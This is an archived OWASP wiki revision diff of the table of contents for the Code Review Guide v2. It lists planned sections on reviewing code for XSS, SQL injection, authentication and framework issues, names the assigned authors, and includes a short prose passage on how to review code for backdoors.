This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "OWASP Code Review V2 Table of Contents"
m (Glenn 'devalias' Grant moved page OWASP Code review V2 Table of Contents to OWASP Code Review V2 Table of Contents: Correct capitalisation as used on category page) |
|||
(63 intermediate revisions by 14 users not shown) | |||
Line 5: | Line 5: | ||
# Author - Eoin Keary | # Author - Eoin Keary | ||
# Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Guide_History]] | # Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Guide_History]] | ||
+ | '''[[CRV2_Forward|Content here]]''' | ||
− | == Code Review Guide | + | == Code Review Guide Introduction== |
# Author - Eoin Keary | # Author - Eoin Keary | ||
# Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Introduction]] | # Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Introduction]] | ||
− | + | '''[[CRV2_Introduction|Content here]]''' | |
− | |||
− | |||
=== What is source code review and Static Analysis === | === What is source code review and Static Analysis === | ||
− | # Author - Zyad Mghazli | + | === What is Code Review === |
+ | # Author - Zyad Mghazli, Eoin Keary | ||
# New Section | # New Section | ||
+ | ''' [[CRV2_WhatIsCodeReview|Content here]]''' | ||
=== Manual Review - Pros and Cons === | === Manual Review - Pros and Cons === | ||
− | # Author - | + | # Author - Zyad Mghazli, Eoin Keary,Gary David Robinson |
# New Section | # New Section | ||
# Suggestion: Benchmark of different Stataic Analysis Tools Zyad Mghazli | # Suggestion: Benchmark of different Stataic Analysis Tools Zyad Mghazli | ||
+ | # [[CRV2_ManualReviewProsCons|Put content here]] | ||
+ | |||
+ | === Advantages of Code Review to Development Practices === | ||
+ | # Author - Gary David Robinson | ||
+ | # New Section | ||
+ | # [[CRV2_AdvantagesToDevPractices|Put content here]] | ||
=== Why code review === | === Why code review === | ||
==== Scope and Objective of secure code review ==== | ==== Scope and Objective of secure code review ==== | ||
# Author - Ashish Rao | # Author - Ashish Rao | ||
+ | # [[CRV2_WhyCodeReview|Put content here]] | ||
=== We can't hack ourselves secure === | === We can't hack ourselves secure === | ||
− | # Author - | + | # Author - Eoin Keary |
# New Section | # New Section | ||
+ | # [[CRV2_CantHackSecure|Put content here]] | ||
=== 360 Review: Coupling source code review and Testing / Hybrid Reviews=== | === 360 Review: Coupling source code review and Testing / Hybrid Reviews=== | ||
− | # Author - | + | # Author - eoin Keary |
# New Section | # New Section | ||
+ | # [[CRV2_360Review|Put content here]] | ||
=== Can static code analyzers do it all? === | === Can static code analyzers do it all? === | ||
# Author - Ashish Rao | # Author - Ashish Rao | ||
# New Section | # New Section | ||
+ | # [[CRV2_CanStaticAnalyzersDoAll|Put content here]] | ||
=Methodology= | =Methodology= | ||
===The code review approach=== | ===The code review approach=== | ||
− | #Author - | + | #Author - Johanna Curiel |
+ | # [[CRV2_CodeReviewApproach|Put content here]] | ||
+ | |||
==== Preparation and context ==== | ==== Preparation and context ==== | ||
− | # Author - | + | # Author - Gary David Robinson |
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Preparation]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Preparation]] | ||
+ | # [[CRV2_PrepContext|Put content here]] | ||
+ | |||
====Application Threat Modeling==== | ====Application Threat Modeling==== | ||
− | #Author - | + | #Author - Larry Conklin |
# Previous version to be updated: [[https://www.owasp.org/OCRG1.1:Application_Threat_Modeling]] | # Previous version to be updated: [[https://www.owasp.org/OCRG1.1:Application_Threat_Modeling]] | ||
+ | # [[CRV2_AppThreatModeling|Put content here]] | ||
+ | |||
====Understanding Code layout/Design/Architecture==== | ====Understanding Code layout/Design/Architecture==== | ||
− | #Author - | + | #Author - Open |
+ | # [[CRV2_CodeLayoutDesignArch|Put content here]] | ||
+ | ====Understanding Business Logic==== | ||
+ | #[[CRV2_BusinessLogic|Put content here]] | ||
+ | |||
===SDLC Integration=== | ===SDLC Integration=== | ||
− | #Author - | + | #Author - Larry Conklin |
# Previous version to be updated: [[https://www.owasp.org/index.php/Security_Code_Review_in_the_SDLC]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Security_Code_Review_in_the_SDLC]] | ||
+ | # [[CRV2_SDLCInt|Put content here]] | ||
+ | |||
====Deployment Models==== | ====Deployment Models==== | ||
=====Secure deployment configurations===== | =====Secure deployment configurations===== | ||
− | #Author - | + | #Author - |
+ | # [[CRV2_SecDepConfig|Put content here]] | ||
+ | |||
# New Section | # New Section | ||
=====Metrics and code review===== | =====Metrics and code review===== | ||
− | #Author - | + | #Author -[email protected] |
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Metrics]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Metrics]] | ||
+ | # [[CRV2_MetricsCodeRev|Put content here]] | ||
+ | |||
=====Source and sink reviews===== | =====Source and sink reviews===== | ||
− | #Author - | + | #Author - Open |
# New Section | # New Section | ||
+ | # [[CRV2_SourceSinkRev|Put content here]] | ||
+ | |||
=====Code review Coverage===== | =====Code review Coverage===== | ||
#Author - Open | #Author - Open | ||
#Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Coverage]] | #Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Coverage]] | ||
+ | # [[CRV2_CodeRevCoverage|Put content here]] | ||
+ | |||
=====Design Reviews===== | =====Design Reviews===== | ||
#Author - Ashish Rao | #Author - Ashish Rao | ||
Line 71: | Line 102: | ||
**Design Areas to be reviewed | **Design Areas to be reviewed | ||
**Common Design Flaws | **Common Design Flaws | ||
+ | # [[CRV2_DesignRev|Put content here]] | ||
+ | |||
=====A Risk based approach to code review===== | =====A Risk based approach to code review===== | ||
− | #Author - | + | #Author - Gary David Robinson |
#New Section | #New Section | ||
*"Doing things right or doing the right things..." | *"Doing things right or doing the right things..." | ||
**"Not all bugs are equal | **"Not all bugs are equal | ||
+ | # [[CRV2_RiskBasedApproach|Put content here]] | ||
+ | |||
====Crawling code==== | ====Crawling code==== | ||
− | #Author - | + | #Author - Open |
# Previous version to be updated: [[https://www.owasp.org/index.php/Crawling_Code]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Crawling_Code]] | ||
*API of Interest: | *API of Interest: | ||
Line 87: | Line 122: | ||
**Spring | **Spring | ||
**.NET MVC | **.NET MVC | ||
− | ** | + | **Struts |
**Zend | **Zend | ||
#New Section | #New Section | ||
*Searching for code in C/C++ | *Searching for code in C/C++ | ||
− | #Author - | + | #Author - Gary David Robinson |
+ | |||
+ | # [[CRV2_CrawlingCode|Put content here]] | ||
+ | |||
====Code reviews and Compliance==== | ====Code reviews and Compliance==== | ||
− | #Author - | + | #Author -Open |
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Reviews_and_Compliance]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Code_Reviews_and_Compliance]] | ||
− | =Reviewing by | + | # [[CRV2_CodeRevCompliance|Put content here]] |
+ | |||
+ | =Reviewing by Technical Control= | ||
===Reviewing code for Authentication controls=== | ===Reviewing code for Authentication controls=== | ||
− | #Author - | + | #Author - Gary Robinson |
+ | # [[CRV2_AuthControls|Put content here]] | ||
+ | |||
====Forgot password==== | ====Forgot password==== | ||
− | #Author Abbas Naderi | + | #Author Abbas Naderi, Larry Conklin |
− | + | # [[CRV2_ForgotPassword|Put content here]] | |
− | + | ||
− | ==== | + | ====CAPTCHA==== |
#Author Larry Conklin, Joan Renchie | #Author Larry Conklin, Joan Renchie | ||
+ | '''[[CRV2_CAPTCHA|Content here]]''' | ||
+ | |||
====Out of Band considerations==== | ====Out of Band considerations==== | ||
− | #Author - | + | #Author - Gary Robinson |
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authentication]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authentication]] | ||
+ | # [[CRV2_OutofBand|Put content here]] | ||
+ | |||
===Reviewing code Authorization weakness=== | ===Reviewing code Authorization weakness=== | ||
− | #Author | + | #Author Eoin Keary .NET MVC added |
+ | # [[CRV2_AuthorizationWeaknesses|Put content here]] | ||
+ | |||
====Checking authz upon every request==== | ====Checking authz upon every request==== | ||
− | #Author - Abbas Naderi | + | #Author - Abbas Naderi |
+ | # [[CRV2_CheckAuthzEachRequest|Put content here]] | ||
+ | |||
====Reducing the attack surface==== | ====Reducing the attack surface==== | ||
− | #Author | + | #Author Gary Robinson |
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authorization]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authorization]] | ||
+ | # [[CRV2_ReducingAttSurf|Put content here]] | ||
+ | |||
+ | ====SSL/TLS Implementations==== | ||
+ | #Author - Eoin Keary | ||
+ | # [[CRV2_SSL-TLS|Put content here]] | ||
+ | |||
====Reviewing code for Session handling==== | ====Reviewing code for Session handling==== | ||
− | #Author - | + | #Author - Abbas Naderi |
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Session-Management]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Session-Management]] | ||
+ | # [[CRV2_SessionHandling|Put content here]] | ||
+ | |||
====Reviewing client side code==== | ====Reviewing client side code==== | ||
#New Section | #New Section | ||
+ | # [[CRV2_ClientSideCodeIntro|Put content here]] | ||
+ | |||
=====Javascript===== | =====Javascript===== | ||
#Author - Abbas Naderi | #Author - Abbas Naderi | ||
+ | # [[CRV2_ClientSideCodeJScript|Put content here]] | ||
+ | |||
=====JSON===== | =====JSON===== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_ClientSideCodeJSon|Put content here]] | ||
+ | |||
=====Content Security Policy===== | =====Content Security Policy===== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_ClientSideCodeContSecPolicy|Put content here]] | ||
+ | |||
====="Jacking"/Framing===== | ====="Jacking"/Framing===== | ||
− | #Author - | + | #Author - Eoin Keary |
+ | # [[CRV2_ClientSideCodeJackingFraming|Put content here]] | ||
+ | |||
=====HTML 5?===== | =====HTML 5?===== | ||
− | |||
− | |||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_ClientSideCodeHTML5|Put content here]] | ||
+ | |||
+ | =====Browser Defenses===== | ||
+ | #Author - Open | ||
+ | # [[CRV2_ClientSideCodeBrowserDefPol|Put content here]] | ||
+ | |||
=====etc...===== | =====etc...===== | ||
+ | |||
====Review code for input validation==== | ====Review code for input validation==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_InputValIntro|Put content here]] | ||
+ | |||
=====Regex Gotchas===== | =====Regex Gotchas===== | ||
− | #Author - | + | #Author - Open |
#New Section | #New Section | ||
+ | # [[CRV2_InputValRegexGotchas|Put content here]] | ||
+ | |||
=====ESAPI===== | =====ESAPI===== | ||
− | #Author - | + | #Author - Open |
+ | #New Section | ||
+ | # Internal Link: [[https://www.owasp.org/index.php/Codereview-Input_Validation]] | ||
+ | # [[CRV2_InputValESAPI|Put content here]] | ||
+ | |||
+ | =====Microsoft Web Protection Library===== | ||
+ | #Author - Michael Hidalgo | ||
#New Section | #New Section | ||
# Internal Link: [[https://www.owasp.org/index.php/Codereview-Input_Validation]] | # Internal Link: [[https://www.owasp.org/index.php/Codereview-Input_Validation]] | ||
+ | # [[CRV2_InputValMicrosoftWebProtectionLibrary|Put content here]] | ||
+ | |||
====Reviewing code for contextual encoding==== | ====Reviewing code for contextual encoding==== | ||
+ | [[Overall approach to content encoding and anti XSS]] | ||
=====HTML Attribute===== | =====HTML Attribute===== | ||
− | #Author - | + | #Author - Eoin Keary |
+ | # [[CRV2_ContextEncHTMLAttribute|Put content here]] | ||
+ | |||
=====HTML Entity===== | =====HTML Entity===== | ||
− | #Author - | + | #Author - Eoin Keary |
+ | # [[CRV2_ContextEncHTMLEntity|Put content here]] | ||
+ | |||
=====Javascript Parameters===== | =====Javascript Parameters===== | ||
+ | #Author - Eoin Keary | ||
+ | # [[CRV2_ContextEncJscriptParams|Put content here]] | ||
+ | |||
+ | =====JQuery===== | ||
#Author - Open | #Author - Open | ||
− | + | # [[CRV2_ContextEncJQuery|Put content here]] | |
− | + | ||
====Reviewing file and resource handling code==== | ====Reviewing file and resource handling code==== | ||
#Author - Open | #Author - Open | ||
− | + | # [[CRV2_FileResourceHandling|Put content here]] | |
− | #Author - | + | |
+ | ====Resource Exhaustion - error handling==== | ||
+ | #Author - Open | ||
+ | # [[CRV2_ResourceExhaustionErrHandling|Put content here]] | ||
+ | |||
=====native calls===== | =====native calls===== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_ResourceExhaustionNativeCalls|Put content here]] | ||
+ | |||
====Reviewing Logging code - Detective Security==== | ====Reviewing Logging code - Detective Security==== | ||
− | #Author - | + | #Author - Gary Robinson |
* Where to Log | * Where to Log | ||
* What to log | * What to log | ||
Line 163: | Line 263: | ||
* How to log | * How to log | ||
# Internal link: [[https://www.owasp.org/index.php/Logging_Cheat_Sheet]] | # Internal link: [[https://www.owasp.org/index.php/Logging_Cheat_Sheet]] | ||
+ | # [[CRV2_LoggingCode|Put content here]] | ||
+ | |||
====Reviewing Error handling and Error messages==== | ====Reviewing Error handling and Error messages==== | ||
− | #Author - | + | #Author - Gary David Robinson |
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Error-Handling]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Error-Handling]] | ||
+ | # [[CRV2_ErrorHandlingMessages|Put content here]] | ||
+ | |||
====Reviewing Security alerts==== | ====Reviewing Security alerts==== | ||
− | #Author - | + | #Author - Gary Robinson |
+ | # [[CRV2_SecurityAlerts|Put content here]] | ||
+ | |||
====Review for active defense==== | ====Review for active defense==== | ||
#Author - Colin Watson | #Author - Colin Watson | ||
+ | # [[CRV2_ActiveDefense|Put content here]] | ||
+ | |||
====Reviewing Secure Storage==== | ====Reviewing Secure Storage==== | ||
− | #Author - | + | #Author - Open source |
# New Section | # New Section | ||
+ | # [[CRV2_SecureStorage|Put content here]] | ||
+ | |||
====Hashing & Salting - When, How and Where==== | ====Hashing & Salting - When, How and Where==== | ||
− | ===== | + | =====Encryption===== |
======.NET====== | ======.NET====== | ||
#Author Larry Conklin, Joan Renchie | #Author Larry Conklin, Joan Renchie | ||
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Cryptographic_Controls]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Cryptographic_Controls]] | ||
*''Can we talk about key storage as well i.e. key management for encryption techniques used in the application? - Ashish Rao'' | *''Can we talk about key storage as well i.e. key management for encryption techniques used in the application? - Ashish Rao'' | ||
+ | '''[[CRV2_HashingandSaltingdotNet|Content here]]''' | ||
+ | |||
=Reviewing by Vulnerability= | =Reviewing by Vulnerability= | ||
===Review Code for XSS=== | ===Review Code for XSS=== | ||
− | #Author | + | #Author Examples added by Eoin Keary |
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Scripting]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Scripting]] | ||
# In reviewing code for XSS - we can give more patterns on "source to sink" patterns for ASP.NET wrf to difference versions and mechanisms to display data in a page - Ashish Rao | # In reviewing code for XSS - we can give more patterns on "source to sink" patterns for ASP.NET wrf to difference versions and mechanisms to display data in a page - Ashish Rao | ||
+ | # [[CRV2_RevCodeXSS|Put content here]] | ||
+ | |||
===Persistent - The Anti pattern=== | ===Persistent - The Anti pattern=== | ||
− | #Author | + | #Author |
+ | # [[CRV2_RevCodePersistentAntiPatternIntro|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
− | #Author Johanna Curiel, | + | #Author Johanna Curiel, Eoin Keary |
+ | # [[CRV2_RevCodePersistentAntiPatterndotNet|Put content here]] | ||
+ | |||
====.Java==== | ====.Java==== | ||
− | #Author | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodePersistentAntiPatternJava|Put content here]] | ||
+ | |||
====PHP==== | ====PHP==== | ||
− | #Author | + | #Author Abbas Naderi |
+ | # [[CRV2_RevCodePersistentAntiPatternPHP|Put content here]] | ||
+ | |||
====Ruby==== | ====Ruby==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_RevCodePersistentAntiPatternRuby|Put content here]] | ||
+ | |||
===Reflected - The Anti pattern=== | ===Reflected - The Anti pattern=== | ||
+ | # [[CRV2_RevCodeReflectedAntiPatternIntro|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeReflectedAntiPatterndotNet|Put content here]] | ||
+ | |||
====.Java==== | ====.Java==== | ||
− | #Author | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeReflectedAntiPatternJava|Put content here]] | ||
+ | |||
====PHP==== | ====PHP==== | ||
− | #Author | + | #Author Abbas Naderi |
+ | # [[CRV2_RevCodeReflectedAntiPatternPHP|Put content here]] | ||
+ | |||
====Ruby==== | ====Ruby==== | ||
+ | # Author - Open | ||
+ | # [[CRV2_RevCodeReflectedAntiPatternIRuby|Put content here]] | ||
+ | |||
===Stored - The Anti pattern=== | ===Stored - The Anti pattern=== | ||
+ | # Author - Johanna Curiel | ||
+ | # [[CRV2_RevCodeStoredAntiPatternIntro|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeStoredAntiPatterndotNET|Put content here]] | ||
+ | |||
====.Java==== | ====.Java==== | ||
− | #Author | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeStoredAntiPatternJava|Put content here]] | ||
+ | |||
====PHP==== | ====PHP==== | ||
− | #Author | + | #Author Johanna Curiel |
+ | # [[CRV2_RevCodeStoredAntiPatternPHP|Put content here]] | ||
+ | |||
====Ruby==== | ====Ruby==== | ||
+ | #Author - Johanna Curiel | ||
+ | # [[CRV2_RevCodeStoredAntiPatternRuby|Put content here]] | ||
+ | |||
===DOM XSS === | ===DOM XSS === | ||
#Author Larry Conklin | #Author Larry Conklin | ||
+ | # [[CRV2_DOMXSS|Put content here]] | ||
+ | |||
===JQuery mistakes=== | ===JQuery mistakes=== | ||
− | #Author | + | #Author |
− | ===Reviewing code for SQL Injection | + | # [[CRV2_JQueryMistakes|Put content here]] |
− | #Author | + | |
+ | ===Reviewing code for SQL Injection=== | ||
+ | #Author Gary Robinson | ||
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection]] | ||
+ | # [[CRV2_RevCodeSQLInjection|Put content here]] | ||
+ | |||
====PHP==== | ====PHP==== | ||
− | #Author - | + | #Author - Mennouchi Islam Azeddine |
+ | # [[CRV2_SQLInjPHP|Put content here]] | ||
+ | |||
====Java==== | ====Java==== | ||
− | #Author - | + | #Author - Johanna Curiel |
+ | # [[CRV2_SQLInjJava|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_SQLInjdotNET|Put content here]] | ||
+ | |||
====HQL==== | ====HQL==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_SQLInjHQL|Put content here]] | ||
+ | |||
===The Anti pattern=== | ===The Anti pattern=== | ||
+ | #Author Larry Conklin | ||
+ | #[[CRV2_AntiPattern| Content here]] | ||
+ | https://www.owasp.org/index.php/CRV2_AntiPattern | ||
====PHP==== | ====PHP==== | ||
− | #Author - | + | #Author - |
+ | # [[CRV2_AntiPatternPHP|Put content here]] | ||
+ | |||
====Java==== | ====Java==== | ||
− | #Author - | + | #Author - |
#=> Searching for traditional SQL,JPA,JPSQL,Criteria,... | #=> Searching for traditional SQL,JPA,JPSQL,Criteria,... | ||
+ | # [[CRV2_AntiPatternJava|Put content here]] | ||
+ | |||
====.NET==== | ====.NET==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_AntiPatterndotNet|Put content here]] | ||
+ | |||
====Ruby==== | ====Ruby==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_AntiPatternRuby|Put content here]] | ||
+ | |||
====Cold Fusion==== | ====Cold Fusion==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_AntiPatternColdFusion|Put content here]] | ||
+ | |||
===Reviewing code for CSRF Issues=== | ===Reviewing code for CSRF Issues=== | ||
− | #Author | + | #Author Abbas Naderi |
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Request_Forgery]] | # Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Request_Forgery]] | ||
− | ===Transactional logic / Non idempotent functions / State Changing Functions=== | + | # This page needs to be deleted. [[CRV2_CSRFIssues|Put content here]] |
− | # | + | |
+ | ===(This task has been deleted) Transactional logic / Non idempotent functions / State Changing Functions=== | ||
+ | # [[CRV2_TransLogic|Put content here]] | ||
+ | |||
===Reviewing code for poor logic /Business logic/Complex authorization=== | ===Reviewing code for poor logic /Business logic/Complex authorization=== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_PoorLogic|Put content here]] | ||
+ | |||
===Reviewing Secure Communications=== | ===Reviewing Secure Communications=== | ||
====.NET Config==== | ====.NET Config==== | ||
#Author Johanna Curiel, Renchie Joan | #Author Johanna Curiel, Renchie Joan | ||
+ | # [[CRV2_SecCommsdotNet|Put content here]] | ||
+ | |||
====Spring Config==== | ====Spring Config==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_SecCommsSpringConfig|Put content here]] | ||
+ | |||
====HTTP Headers==== | ====HTTP Headers==== | ||
− | #Author | + | #Author Gary Robinson |
− | + | # [[CRV2_SecCommsHTTPHdrs|Put content here]] | |
− | # | + | |
− | |||
− | |||
===Tech-Stack pitfalls=== | ===Tech-Stack pitfalls=== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_TechStackPitfalls|Put content here]] | ||
+ | |||
===Framework specific Issues=== | ===Framework specific Issues=== | ||
====Spring==== | ====Spring==== | ||
#Author - Open | #Author - Open | ||
− | ==== | + | # [[CRV2_FrameworkSpecIssuesSpring|Put content here]] |
+ | |||
+ | ====Struts==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_FrameworkSpecIssuesStruts|Put content here]] | ||
+ | |||
====Drupal==== | ====Drupal==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesDrupal|Put content here]] | ||
+ | |||
====Ruby on Rails==== | ====Ruby on Rails==== | ||
#Author - Open | #Author - Open | ||
+ | # [[CRV2_FrameworkSpecIssuesROR|Put content here]] | ||
+ | |||
====Django==== | ====Django==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesDjango|Put content here]] | ||
+ | |||
====.NET Security / MVC==== | ====.NET Security / MVC==== | ||
− | #Author Johanna Curiel, | + | #Author Johanna Curiel, Eoin Keary |
+ | # [[CRV2_FrameworkSpecIssuesdotNetMVC|Put content here]] | ||
+ | |||
====Security in ASP.NET applications==== | ====Security in ASP.NET applications==== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNet|Put content here]] | ||
+ | |||
=====Strongly Named Assemblies===== | =====Strongly Named Assemblies===== | ||
− | #Author Johanna Curiel, | + | #Author Johanna Curiel, Larry Conklin |
+ | # [[CRV2_FrameworkSpecIssuesASPNetStrongAssembiles|Put content here]] | ||
+ | |||
======Round Tripping====== | ======Round Tripping====== | ||
+ | # Author - Open | ||
+ | # [[CRV2_FrameworkSpecIssuesASPNetRT|Put content here]] | ||
+ | |||
======How to prevent Round tripping====== | ======How to prevent Round tripping====== | ||
− | #Author Johanna Curiel | + | # Author - Open |
+ | #Author Johanna Curiel | ||
+ | # [[CRV2_FrameworkSpecIssuesASPNetRTPrevention|Put content here]] | ||
+ | |||
=====Setting the right Configurations===== | =====Setting the right Configurations===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNetConfigs|Put content here]] | ||
+ | |||
=====Authentication Options===== | =====Authentication Options===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNetAuth|Put content here]] | ||
+ | |||
=====Code Review for Managed Code - .Net 1.0 and up===== | =====Code Review for Managed Code - .Net 1.0 and up===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNetManagedCode|Put content here]] | ||
+ | |||
=====Using OWASP Top 10 as your guideline===== | =====Using OWASP Top 10 as your guideline===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPTop10|Put content here]] | ||
+ | |||
=====Code review for Unsafe Code (C#)===== | =====Code review for Unsafe Code (C#)===== | ||
− | #Author Johanna Curiel | + | #Author Johanna Curiel |
+ | # [[CRV2_FrameworkSpecIssuesASPNetUnsafeCode|Put content here]] | ||
+ | |||
====PHP Specific Issues==== | ====PHP Specific Issues==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesPHP|Put content here]] | ||
+ | |||
====Classic ASP==== | ====Classic ASP==== | ||
#Author Johanna Curiel | #Author Johanna Curiel | ||
+ | # [[CRV2_FrameworkSpecIssuesASPClassic|Put content here]] | ||
+ | |||
====C#==== | ====C#==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesCsharp|Put content here]] | ||
+ | |||
====C/C++==== | ====C/C++==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesCplusplus|Put content here]] | ||
+ | |||
====Objective C==== | ====Objective C==== | ||
#Author Open | #Author Open | ||
+ | # [[CRV2_FrameworkSpecIssuesObectiveC|Put content here]] | ||
+ | |||
====Java==== | ====Java==== | ||
− | #Author | + | #Author Open |
+ | # [[CRV2_FrameworkSpecIssuesJava|Put content here]] | ||
+ | |||
====Android==== | ====Android==== | ||
#Author Open | #Author Open | ||
+ | # [[CRV2_FrameworkSpecIssuesAndroid|Put content here]] | ||
+ | |||
====Coldfusion==== | ====Coldfusion==== | ||
#Author Open | #Author Open | ||
+ | # [[CRV2_FrameworkSpecIssuesColdfusion|Put content here]] | ||
+ | |||
+ | ====CodeIgniter==== | ||
+ | |||
+ | # Author Open | ||
+ | # [[CRV2_FrameworkSpecIssuesCodeIgniter|Put content here]] | ||
+ | |||
=Security code review for Agile development= | =Security code review for Agile development= | ||
− | #Author | + | #Author Carlos Pantelides |
− | = | + | # [[CRV2_CodeReviewAgile|Put content here]] |
− | + | ||
− | + | =Code Review for Backdoors= | |
+ | #Author Yiannis Pavlosoglou | ||
+ | The review of a piece of source code for backdoors has one excruciating difference to a traditional source code review: The fact that someone with 'commit' or 'write' access to the source code repository has malicious intentions spanning well beyond their current developer remit. Because of this difference, a code review for backdoors is often seen as a very specialised review and can sometimes be considered not a code review per say. | ||
+ | |||
+ | A traditional code review has the objective of determining if a vulnerability is present within the code, further to this if the vulnerability is exploitable and under what conditions. A code review for backdoors has the objective to determine if a certain portion of the codebase is carrying code that is unnecessary for the logic and implementation of the use cases it serves. | ||
+ | |||
+ | Further to this, the reviewer, looks for the trigger points of that logic. Typical examples include a branch statement going off to a part of assembly or obfuscated code. The reviewer is looking for patterns of abnormality in terms of code segments that would not be expected to be present under normal conditions. | ||
+ | |||
+ | An excellent introduction into how to look for rootkits in the Java programming language can be found [https://www.blackhat.com/presentations/bh-usa-09/WILLIAMS/BHUSA09-Williams-EnterpriseJavaRootkits-PAPER.pdf here]. In this paper J. Williams covers a variety of backdoor examples including file system access through a web server, as well as time based attacks involving a key aspect of malicious functionality been made available after a certain amount of time. Such examples form the foundation of what any reviewer for back doors should try to automate, regardless of the language in which the review is taking place. | ||
+ | |||
+ | =Code Review Tools= | ||
+ | https://www.owasp.org/index.php/CRV2_CodeReviewTools |
Latest revision as of 01:27, 8 January 2016
- 1 OWASP Code Review Guide v2.0:
- 1.1 Forward
- 1.2 Code Review Guide Introduction
- 1.2.1 What is source code review and Static Analysis
- 1.2.2 What is Code Review
- 1.2.3 Manual Review - Pros and Cons
- 1.2.4 Advantages of Code Review to Development Practices
- 1.2.5 Why code review
- 1.2.6 We can't hack ourselves secure
- 1.2.7 360 Review: Coupling source code review and Testing / Hybrid Reviews
- 1.2.8 Can static code analyzers do it all?
- 2 Methodology
- 3 Reviewing by Technical Control
- 3.1 Reviewing code for Authentication controls
- 3.2 Reviewing code Authorization weakness
- 3.2.1 Checking authz upon every request
- 3.2.2 Reducing the attack surface
- 3.2.3 SSL/TLS Implementations
- 3.2.4 Reviewing code for Session handling
- 3.2.5 Reviewing client side code
- 3.2.6 Review code for input validation
- 3.2.7 Reviewing code for contextual encoding
- 3.2.8 Reviewing file and resource handling code
- 3.2.9 Resource Exhaustion - error handling
- 3.2.10 Reviewing Logging code - Detective Security
- 3.2.11 Reviewing Error handling and Error messages
- 3.2.12 Reviewing Security alerts
- 3.2.13 Review for active defense
- 3.2.14 Reviewing Secure Storage
- 3.2.15 Hashing & Salting - When, How and Where
- 4 Reviewing by Vulnerability
- 4.1 Review Code for XSS
- 4.2 Persistent - The Anti pattern
- 4.3 Reflected - The Anti pattern
- 4.4 Stored - The Anti pattern
- 4.5 DOM XSS
- 4.6 JQuery mistakes
- 4.7 Reviewing code for SQL Injection
- 4.8 The Anti pattern
- 4.9 Reviewing code for CSRF Issues
- 4.10 (This task has been deleted) Transactional logic / Non idempotent functions / State Changing Functions
- 4.11 Reviewing code for poor logic /Business logic/Complex authorization
- 4.12 Reviewing Secure Communications
- 4.13 Tech-Stack pitfalls
- 4.14 Framework specific Issues
